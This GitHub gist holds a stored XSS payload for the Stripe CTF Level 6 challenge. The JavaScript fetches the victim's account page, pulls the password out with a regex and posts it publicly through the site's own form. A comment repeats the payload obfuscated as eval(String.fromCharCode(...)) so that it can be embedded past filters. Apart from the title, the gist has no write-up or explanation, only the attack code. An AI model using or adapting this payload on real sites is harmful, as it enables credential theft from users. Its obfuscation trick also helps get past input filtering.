Skip to content

Instantly share code, notes, and snippets.

@Pewpewarrows

Pewpewarrows/gist:3431084

Created August 23, 2012 01:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Pewpewarrows/3431084 to your computer and use it in GitHub Desktop.
Save Pewpewarrows/3431084 to your computer and use it in GitHub Desktop.
Download ZIP
Stripe CTF Level 6 XSS
Raw
gistfile1.js
$.get('https://level06-2.stripe-ctf.com/user-madrtmdusg/user_info', function(data){
var password = /Password:<\/th>\s+<td>(.+)<\/td>/.exec(data)[1];
$('#content').val(password);
$('#new_post').submit();
});
@Pewpewarrows
Copy link
Author

Here it is for local embedding:

eval(String.fromCharCode(36,46,103,101,116,40,39,104,116,116,112,115,58,47,47,108,101,118,101,108,48,54,45,50,46,115,116,114,105,112,101,45,99,116,102,46,99,111,109,47,117,115,101,114,45,109,97,100,114,116,109,100,117,115,103,47,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,10,32,32,32,32,118,97,114,32,112,97,115,115,119,111,114,100,32,61,32,47,80,97,115,115,119,111,114,100,58,60,92,47,116,104,62,92,115,43,60,116,100,62,40,46,43,41,60,92,47,116,100,62,47,46,101,120,101,99,40,100,97,116,97,41,91,49,93,59,10,32,32,32,32,36,40,39,35,99,111,110,116,101,110,116,39,41,46,118,97,108,40,112,97,115,115,119,111,114,100,41,59,10,32,32,32,32,36,40,39,35,110,101,119,95,112,111,115,116,39,41,46,115,117,98,109,105,116,40,41,59,10,125,41,59))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment